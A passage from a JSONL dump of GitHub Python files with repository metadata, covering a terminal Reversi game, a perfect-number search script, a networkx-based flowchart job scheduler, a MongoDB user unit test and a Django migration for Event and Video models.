2):\n\t\t\tprint(line_one)\n\t\t\tprint(line_two)\n\t\tprint(' ' + (blue + white) * 3 + colored('● ', 'blue', attrs=['blink']) + \\\n\t\t\t colored('● ', 'white', attrs=['blink']) + \\\n\t\t\t 'Tie' + colored(' ● ', 'white', attrs=['blink']) + \\\n\t\t\t colored('● ', 'blue', attrs=['blink']) + ((white + blue) * 3))\n\t\tfor i in range(0, 2):\n\t\t\tprint(line_two)\n\t\t\tprint(line_one)\n\tprint(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'green',))\n\n# start a new game if player wants to play again\ndef play_again():\n\tchoice = input('\\n Play again (`yes`/`no`)?: ').lower()\n\twhile choice not in ('yes', 'no', 'y', 'n', 'ye'):\n\t\tchoice = input('\\n Play again (`yes`/`no`?): ').lower()\n\tif choice[0] == 'y':\n\t\tboard = []\n\t\tplay_game(board)\n\n\n# play game\ndef play_game(board):\n\tboard, white_legal_moves, black_legal_moves = prepare_new_game(board)\n\tif white_legal_moves == False:\n\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\twhile white_legal_moves and black_legal_moves:\n\t\t# human turn\n\t\tboard = take_human_turn(board, (white_legal_moves, black_legal_moves))\n\t\tprint('\\n Your move: \\n')\n\t\tprint_board(board)\n\n\t\t# recompute legal moves\n\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\n\t\t# computer turn\n\t\tif white_legal_moves and black_legal_moves:\n\t\t\tboard = take_computer_turn(board, (white_legal_moves, black_legal_moves))\n\t\t\tprint('\\n Computer move: \\n')\n\t\t\tprint_board(board)\n\n\t\t\t# recompute legal moves\n\t\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\n\tend_game(board)\n\tplay_again()\n\n\n# HELPER FUNCTIONS\n\n# determine legal moves for both players\ndef get_legal_moves(board):\n\twhite_pieces = np.where(board == 1)\n\tblack_pieces = np.where(board == 2)\n\n\twhite_legal_moves = []\n\tblack_legal_moves = []\n\n\tfor color in [('white', white_pieces), ('black', black_pieces)]:\n\t\tpieces = color[1]\n\t\tplayer = 1 if color[0] == 'white' else 2\n\t\topponent = 2 if color[0] == 'white' else 1\n\t\tlegal_moves = []\n\n\t\t# numpy where() result is two np arrays of row and column indices of matches\n\t\tfor piece in zip(pieces[0], pieces[1]):\n\t\t\trow = piece[0]\n\t\t\tcol = piece[1]\n\n\t\t\t# get the box of values surrounding a cell\n\t\t\trect = get_rect(board, row, col)\n\n\t\t\t# get positions in rect that have enemy moves (directions to explore)\n\t\t\t# this way we don't have to check 8 possible move directions for every piece every time!\n\t\t\topponent_pieces = np.where(rect == opponent)\n\n\t\t\tfor move in zip(opponent_pieces[0], opponent_pieces[1]):\n\t\t\t\t# normalize 0 to 2 into -1 to 1 to get direction vector\n\t\t\t\ty_direction = move[0] - 1\n\t\t\t\tx_direction = move[1] - 1\n\n\t\t\t\t# to start, move in vector direction two steps (over the opponent piece we just identified)\n\t\t\t\tnew_row = row + y_direction * 2\n\t\t\t\tnew_col = col + x_direction * 2\n\n\t\t\t\t# if cell is empty, stop and add to legal moves\n\t\t\t\t# if piece in cell is your own, stop\n\t\t\t\t# if piece in cell is opponent's, continue\n\t\t\t\t# continue moving one step in direction until empty cell or end of board\n\t\t\t\twhile new_row >= 0 and new_row <= 7 and new_col >= 0 and new_col <= 7:\n\t\t\t\t\tif board[new_row][new_col] == 0:\n\t\t\t\t\t\t# don't add twice if it's already there from another piece's legal moveset\n\t\t\t\t\t\tif (new_row, new_col) not in legal_moves:\n\t\t\t\t\t\t\tlegal_moves.append((new_row, new_col))\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif board[new_row][new_col] == opponent:\n\t\t\t\t\t\tnew_row += y_direction\n\t\t\t\t\t\tnew_col += x_direction\n\t\t\t\t\telse:\n\t\t\t\t\t\t# own piece\n\t\t\t\t\t\tbreak\n\n\t\tif player == 1:\n\t\t\twhite_legal_moves = legal_moves\n\t\telse:\n\t\t\tblack_legal_moves = legal_moves\n\n\treturn white_legal_moves, black_legal_moves\n\n# update the board based on the selected move\ndef update_board(board, grid_val, player):\n\topponent = 2 if player == 1 else 1\n\n\trow = grid_val[0]\n\tcol = grid_val[1]\n\n\t# simpler variant of get_legal_moves() algo\n\trect = get_rect(board, row, col)\n\topponent_pieces = np.where(rect == opponent)\n\n\tfor move in zip(opponent_pieces[0], opponent_pieces[1]):\n\t\t# normalize 0 to 2 into -1 to 1 to get direction vector\n\t\ty_direction = move[0] - 1\n\t\tx_direction = move[1] - 1\n\n\t\t# skip over piece we know is opponent's\n\t\tnew_row = row + y_direction * 2\n\t\tnew_col = col + x_direction * 2\n\n\t\t# add initial opponent piece\n\t\tpieces_to_flip = [(row, col), (row + y_direction, col + x_direction)]\n\n\t\t# if cell is empty, stop\n\t\t# if piece in cell is opponent's, add to pieces_to_flip list continue\n\t\t# if piece in cell is your own, stop and flip pieces in pieces_to_flip\n\t\t# continue moving one step in direction until above case or end of board\n\t\twhile (new_row >= 0 and new_row <= 7 and new_col >= 0 and new_col <= 7):\n\t\t\tif board[new_row][new_col] == opponent:\n\t\t\t\tpieces_to_flip.append((new_row, new_col))\n\t\t\t\tnew_row += y_direction\n\t\t\t\tnew_col += x_direction\n\t\t\telif board[new_row][new_col] == player:\n\t\t\t\tfor piece in pieces_to_flip:\n\t\t\t\t\tboard[piece[0]][piece[1]] = player\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\t# empty cell\n\t\t\t\tbreak\n\n\treturn board\n\n# change player input to numpy-readable row,col\ndef move_to_grid_val(move):\n\tcol = int(letter_to_int[move[0]])\n\trow = int(move[1])-1\n\treturn (row, col)\n\n# return a square window of pieces adjacent to the selected move\ndef get_rect(board, row, col):\n\t# special cases that limit a moveset:\n\t# \tall of rows 0, 7 and all of cols 0, 7, excluding corners\n\t# \tcorners = (0,0), (0,7), (7,0), (7, 7)\n\t# default: any interior cell (neither row nor col is 0 or 7)\n\t#\n\t# - must be converted into a 3x3 np array to preserve direction\n\t# \tvector functionality\n\t# - check most common to least common case for compute efficiency\n\t#\n\n\tif row > 0 and row < 7 and col > 0 and col < 7:\n\t\t# get immediate square around the piece\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 2) for j in range(col - 1, col + 2)], (3,3))\n\t\treturn rect\n\telif row == 0 and col not in (0, 7):\n\t\t# top-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row, row + 2) for j in range(col-1, col + 2)], (2,3))\n\t\trect = np.concatenate((np.array([[0.,0.,0.]]), rect))\n\t\treturn rect\n\telif row == 7 and col not in (0, 7):\n\t\t# bottom-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 1) for j in range(col-1, col + 2)], (2,3))\n\t\trect = np.concatenate((rect, np.array([[0.,0.,0.]])))\n\t\treturn rect\n\telif col == 0 and row not in (0, 7):\n\t\t# left-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 2) for j in range(col, col + 2)], (3,2))\n\t\trect = np.concatenate((np.array([[0.,0.,0.]]).T, rect), axis=1)\n\t\treturn rect\n\telif col == 7 and row not in (0, 7):\n\t\t# right-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 2) for j in range(col-1, col + 1)], (3,2))\n\t\trect = np.concatenate((rect, np.array([[0.,0.,0.]]).T), axis=1)\n\t\treturn rect\n\telse:\n\t\t# corner: (0,0), (0,7), (7,0), (7,7)):\n\t\tif row == 0 and col == 0:\n\t\t\trect = np.reshape([board[i][j] for i in range(row, row + 2) for j in range(col, col + 2)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((1,0), (1,0)), mode='constant', constant_values=0)\n\t\telif row == 0 and col == 7:\n\t\t\trect = np.reshape([board[i][j] for i in range(row, row + 2) for j in range(col - 1, col + 1)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((1,0), (0,1)), mode='constant', constant_values=0)\n\t\telif row == 7 and col == 0:\n\t\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 1) for j in range(col, col + 2)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((0,1), (1,0)), mode='constant', constant_values=0)\n\t\telif row == 7 and col == 7:\n\t\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 1) for j in range(col - 1, col + 1)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((0,1), (0,1)), mode='constant', constant_values=0)\n\treturn rect\n\n# MAIN\nplay_game(board)\n", "repo_name": "allenhj/pyReversi", "sub_path": "reversi.py", "file_name": "reversi.py", "file_ext": "py", "file_size_in_byte": 17401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "termcolor.colored", "line_number": 9, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 10, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 11, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 12, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 48, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 50, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 51, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 53, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 57, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 59, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 61, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 64, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 65, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 70, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 71, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 74, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 80, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 83, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 116, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 199, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 208, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 208, "usage_type": "attribute"}, {"api_name": "termcolor.colored", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 211, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 216, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 217, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 218, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 219, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 221, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 222, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 225, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 226, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 227, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 228, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 229, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 231, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 232, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 236, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 237, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 245, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 246, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 247, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 248, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 418, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 440, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 449, "usage_type": "call"}]} +{"seq_id": "74670673443", "text": "# -*- coding: utf-8 -*-\r\n'''\r\nPerfect number 完全数\r\n2020年8月3日13:55:52\r\n彭寒冰\r\n'''\r\nimport json\r\n\r\ndef factorsum(num):\r\n self = num\r\n result = 1\r\n factor = 2\r\n exponent = 0\r\n i = 2\r\n while i * i <= num:\r\n if num % i == 0:\r\n if i == factor:\r\n exponent += 1\r\n else:\r\n result *= (factor ** (exponent + 1) - 1) // (factor - 1)\r\n factor = i\r\n exponent = 1\r\n num //= i\r\n else:\r\n i += 1\r\n if num == factor:\r\n result *= (factor ** (exponent + 2) - 1) // (factor -1)\r\n else:\r\n result *= (factor ** (exponent + 1) - 1) // (factor -1) * (1 + num)\r\n return result - self\r\n\r\nclass perfect_number:\r\n number = 2\r\n perfects = []\r\n\r\n @classmethod\r\n def load(cls):\r\n try:\r\n with open('perfect_number.json', encoding='utf-8') as file:\r\n save = json.load(file)\r\n except FileNotFoundError:\r\n pass\r\n else:\r\n cls.number = save['progress']\r\n cls.perfects = save['perfect_numbers']\r\n if cls.number in cls.perfects:\r\n cls.number += 1\r\n\r\n @classmethod\r\n def save(cls):\r\n with open('perfect_number.json', 'w', encoding='utf-8') as file:\r\n json.dump({'progress': cls.number,\r\n 'perfect_numbers': cls.perfects}, file)\r\n\r\n @classmethod\r\n def search(cls):\r\n cls.load()\r\n try:\r\n while True:\r\n if cls.number == factorsum(cls.number):\r\n cls.perfects.append(cls.number)\r\n cls.number += 1\r\n except KeyboardInterrupt:\r\n pass\r\n finally:\r\n cls.save()\r\n print(f'Searching reaches {cls.number}')\r\n print('Perfect numbers found:')\r\n print(*cls.perfects, sep=', ')\r\n\r\nif __name__ == '__main__':\r\n perfect_number.search()\r\n", "repo_name": "phbice/public_code", "sub_path": "Python/misc/perfect_number.py", "file_name": "perfect_number.py", "file_ext": "py", "file_size_in_byte": 1966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "30812466497", "text": "import json\nimport os\nimport sys\nimport time\nimport traceback\nimport warnings\n\nimport matplotlib.cbook\nimport networkx as nx\nfrom flojoy import get_next_directions, get_next_nodes\n\nwarnings.filterwarnings(\"ignore\", category=matplotlib.cbook.mplDeprecation)\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.abspath(os.path.join(dir_path, os.pardir)))\n\nfrom services.job_service import JobService\nfrom utils.dynamic_module_import import get_module_func, create_map\nfrom utils.topology import Topology\n\nENV_CI = \"CI\"\n\n\nclass FlowScheduler:\n def __init__(self, scheduler_job_id, fc, extraParams, jobsetId=None) -> None:\n # print(\"sjid\", scheduler_job_id)\n # print(\"fc\", fc)\n # print(\"ep\", extraParams)\n # print(\"jsid\", jobsetId)\n self.scheduler_job_id = scheduler_job_id\n self.jobset_id = jobsetId\n self.flow_chart = fc\n # TODO: split this up into different input vars\n self.maximum_runtime = extraParams.get(\"maximumRuntime\", 3000)\n self.node_delay = extraParams.get(\"nodeDelay\", 0)\n self.job_service = JobService(\"flojoy\", self.maximum_runtime)\n\n def run(self):\n print(\"\\nrun jobset:\", self.jobset_id)\n self.is_ci = os.getenv(key=ENV_CI, default=False)\n print(\"is running in CI?\", self.is_ci)\n self.nx_graph = reactflow_to_networkx(\n self.flow_chart[\"nodes\"], self.flow_chart[\"edges\"]\n )\n self.topology = Topology(graph=self.nx_graph)\n self.topology.print_id_to_label_mapping()\n self.topology.print_graph()\n self.topology.collect_ready_jobs()\n\n num_times_waited_for_new_jobs = 0\n wait_time_for_new_jobs = 0.1\n wait_time_multiplier = 2\n max_wait_time = 10\n\n while not self.topology.finished():\n print(\"\\nnext wave\")\n # self.topology.print_graph()\n\n try:\n self.topology.collect_ready_jobs()\n next_jobs = self.topology.next_jobs()\n\n if len(next_jobs) == 0:\n wait_time_for_new_jobs = wait_time_for_new_jobs * pow(\n wait_time_multiplier, num_times_waited_for_new_jobs\n )\n wait_time_for_new_jobs = min(wait_time_for_new_jobs, max_wait_time)\n print(\n f\"no new jobs to execute, sleeping for {wait_time_for_new_jobs} sec\"\n )\n time.sleep(wait_time_for_new_jobs)\n num_times_waited_for_new_jobs += 1\n continue\n\n # reset wait count\n num_times_waited_for_new_jobs = 0\n\n self.topology.print_jobq(\"ready \")\n\n for job_id in next_jobs:\n self.run_job(job_id)\n\n print(\"waiting on jobs enqueued\")\n for job_id in next_jobs:\n job_result, success = self.wait_for_job(job_id)\n self.process_job_result(job_id, job_result, success)\n\n self.topology.clear_jobq()\n\n except Exception as e:\n self.topology.print_graph(\n \"exception occurred in scheduler, current working graph:\"\n )\n print(traceback.format_exc())\n raise e\n\n # jobset finished\n self.topology.print_graph()\n self.notify_jobset_finished()\n print(\"finished proceessing jobset\", self.jobset_id, \"\\n\")\n\n def process_job_result(self, job_id, job_result, success):\n \"\"\"\n process special instructions to scheduler\n \"\"\"\n\n if not success:\n self.topology.mark_job_failure(job_id)\n return\n\n # process instruction to flow through specified directions\n for direction_ in get_next_directions(job_result):\n direction = direction_.lower()\n self.topology.mark_job_success(job_id, direction)\n\n # process instruction to flow to specified nodes\n nodes_to_add = []\n next_nodes = get_next_nodes(job_result)\n if next_nodes is not None:\n nodes_to_add += [node_id for node_id in next_nodes]\n\n if len(nodes_to_add) > 0:\n print(\n \" + adding nodes to graph:\",\n [self.topology.get_label(n_id, original=True) for n_id in nodes_to_add],\n )\n\n for node_id in nodes_to_add:\n print(\"OVER HERE\")\n self.topology.restart(node_id)\n\n def run_job(self, job_id):\n node = self.nx_graph.nodes[job_id]\n cmd = node[\"cmd\"]\n cmd_mock = node[\"cmd\"] + \"_MOCK\"\n func = get_module_func(cmd, cmd)\n if self.is_ci:\n try:\n func = get_module_func(cmd, cmd_mock)\n except Exception:\n pass\n\n dependencies = self.topology.get_job_dependencies(job_id, original=True)\n\n print(\n \" enqueue job:\",\n self.topology.get_label(job_id),\n \"dependencies:\",\n [self.topology.get_label(dep_id, original=True) for dep_id in dependencies],\n )\n\n self.job_service.enqueue_job(\n func=func,\n jobset_id=self.jobset_id,\n job_id=job_id,\n iteration_id=job_id,\n ctrls=node[\"ctrls\"],\n previous_job_ids=[],\n input_job_ids=dependencies,\n )\n\n def wait_for_job(self, job_id):\n print(\" waiting for job:\", self.topology.get_label(job_id))\n\n while True:\n time.sleep(self.node_delay)\n\n job = self.job_service.fetch_job(job_id=job_id)\n if job:\n job_status = job.get_status()\n\n if job_status in [\"finished\", \"failed\"]:\n job_result = job.result\n success = True if job_status == \"finished\" else False\n print(\n \" job:\", self.topology.get_label(job_id), \"status:\", job_status\n )\n break\n\n return job_result, success\n\n def notify_jobset_finished(self):\n self.job_service.redis_dao.remove_item_from_list(\n f\"{self.jobset_id}_watch\", self.scheduler_job_id\n )\n\n def print_flow_chart(self):\n print(\n \"nodes from FE:\",\n json.dumps(self.flow_chart[\"nodes\"], indent=2),\n \"\\nedges from FE:\",\n json.dumps(self.flow_chart[\"edges\"], indent=2),\n )\n\n\ndef reactflow_to_networkx(elems, edges):\n nx_graph: nx.DiGraph = nx.DiGraph()\n for i in range(len(elems)):\n el = elems[i]\n node_id = el[\"id\"]\n data = el[\"data\"]\n cmd = el[\"data\"][\"func\"]\n ctrls = data[\"ctrls\"] if \"ctrls\" in data else {}\n inputs = data[\"inputs\"] if \"inputs\" in data else {}\n label = data[\"label\"] if \"label\" in data else {}\n nx_graph.add_node(\n node_id,\n pos=(el[\"position\"][\"x\"], el[\"position\"][\"y\"]),\n id=el[\"id\"],\n ctrls=ctrls,\n inputs=inputs,\n label=label,\n cmd=cmd,\n )\n\n for i in range(len(edges)):\n e = edges[i]\n _id = e[\"id\"]\n u = e[\"source\"]\n v = e[\"target\"]\n label = e[\"sourceHandle\"]\n nx_graph.add_edge(u, v, label=label, id=_id)\n\n nx.draw(nx_graph, with_labels=True)\n\n return nx_graph\n\n\ndef run(**kwargs):\n try:\n return FlowScheduler(**kwargs).run()\n except Exception:\n print(\"exception occured while running the flowchart\")\n print(traceback.format_exc())\n", "repo_name": "Ben-Epstein/studio", "sub_path": "PYTHON/WATCH/watch.py", "file_name": "watch.py", "file_ext": "py", "file_size_in_byte": 7607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.cbook.cbook", "line_number": 12, "usage_type": "attribute"}, {"api_name": "matplotlib.cbook", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 15, "usage_type": "attribute"}, {"api_name": "services.job_service.JobService", "line_number": 36, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.topology.Topology", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 94, "usage_type": "call"}, {"api_name": "flojoy.get_next_directions", "line_number": 112, "usage_type": "call"}, {"api_name": "flojoy.get_next_nodes", "line_number": 118, "usage_type": "call"}, {"api_name": "utils.dynamic_module_import.get_module_func", "line_number": 136, "usage_type": "call"}, {"api_name": "utils.dynamic_module_import.get_module_func", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 166, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 192, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 197, "usage_type": "attribute"}, {"api_name": "networkx.draw", "line_number": 224, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "32473116481", "text": "from dataObject import Utilisateur,UtilisateurHelper,DbStore\nimport unittest\nimport logging\nimport logging.config\n\nclass DbData(unittest.TestCase):\n \n def test_utilisateur(self):\n \n self.dbStore = DbStore(\"192.168.1.27:27017\",\"MakerLoc\")\n helper = UtilisateurHelper(self.dbStore)\n helper.cleanAll()\n u1 = Utilisateur(\"delporte\",\"1234\",\"sdelporte@gmail.com\")\n u2 = Utilisateur(\"pol\",\"1234\",\"pol@gmail.com\")\n helper.store(u1)\n helper.secureStore(u2)\n helper.secureStore(u2)\n helper.lenght()\n u3 = helper.getOneByName(\"delporte\")\n assert u3 != None\n print(u3.toString())\n u1.cardId = \"789\"\n helper.updateAllField(u1)\n u3 = helper.getOneByName(\"delporte\")\n assert u3.cardId == \"789\" \n\n\n\n\nif __name__ == \"__main__\" : \n logging.config.fileConfig('logger.conf') \n unittest.main()", "repo_name": "pihito/MakerLoc", "sub_path": "app/unitTest.py", "file_name": "unitTest.py", "file_ext": "py", "file_size_in_byte": 907, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "dataObject.DbStore", "line_number": 10, "usage_type": "call"}, {"api_name": "dataObject.UtilisateurHelper", "line_number": 11, "usage_type": "call"}, {"api_name": "dataObject.Utilisateur", "line_number": 13, "usage_type": "call"}, {"api_name": "dataObject.Utilisateur", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.config.fileConfig", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 31, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "14843743996", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('is_active', models.BooleanField(default=True, help_text='Whether this item is active, use this instead of deleting')),\n ('created_on', models.DateTimeField(help_text='When this item was originally created', auto_now_add=True)),\n ('modified_on', models.DateTimeField(help_text='When this item was last modified', auto_now=True)),\n ('date', models.DateField(help_text='The date when the event will occur')),\n ('time', models.TimeField(help_text='The start time for the event')),\n ('duration', models.IntegerField(help_text='The duration in minutes of the event')),\n ('title', models.CharField(help_text='What is the title of this event', max_length=64)),\n ('logo', models.ImageField(help_text='The image representing the event in general (should be square)', upload_to='photos/')),\n ('description', models.TextField(help_text='More descriptively say about this event', max_length=256)),\n ('venue', models.CharField(help_text='The exact location where event will take place', max_length=128)),\n ('recurrence_type', models.CharField(blank=True, max_length=1, null=True, help_text='Does this event accur weekly or monthly', choices=[(b'W', b'Weekly'), (b'M', b'Monthly')])),\n ('dow', models.IntegerField(null=True, blank=True)),\n ('monthly_ordinal', models.IntegerField(null=True, blank=True)),\n ('photo_tag', models.CharField(max_length=64, null=True, blank=True)),\n ('end_date', models.DateField(help_text='Last date of recurrence', null=True, blank=True)),\n ('created_by', models.ForeignKey(related_name='events_event_creations', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which originally created this item')),\n ('modified_by', models.ForeignKey(related_name='events_event_modifications', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which last modified this item')),\n ('parent', models.ForeignKey(related_name='children', on_delete=models.deletion.PROTECT, blank=True, to='events.Event', null=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Video',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('is_active', models.BooleanField(default=True, help_text='Whether this item is active, use this instead of deleting')),\n ('created_on', models.DateTimeField(help_text='When this item was originally created', auto_now_add=True)),\n ('modified_on', models.DateTimeField(help_text='When this item was last modified', auto_now=True)),\n ('name', models.CharField(help_text='The name of the video', max_length=255)),\n ('summary', models.TextField(help_text='A short blurb about the video')),\n ('description', models.TextField(help_text='The full description for the video')),\n ('youtube_id', models.CharField(help_text='The id youtube uses for this video', max_length=255)),\n ('created_by', models.ForeignKey(related_name='events_video_creations', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which originally created this item')),\n ('modified_by', models.ForeignKey(related_name='events_video_modifications', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which last modified this item')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n ]\n", "repo_name": "nyaruka/klab", "sub_path": "klab/events/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 4407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, 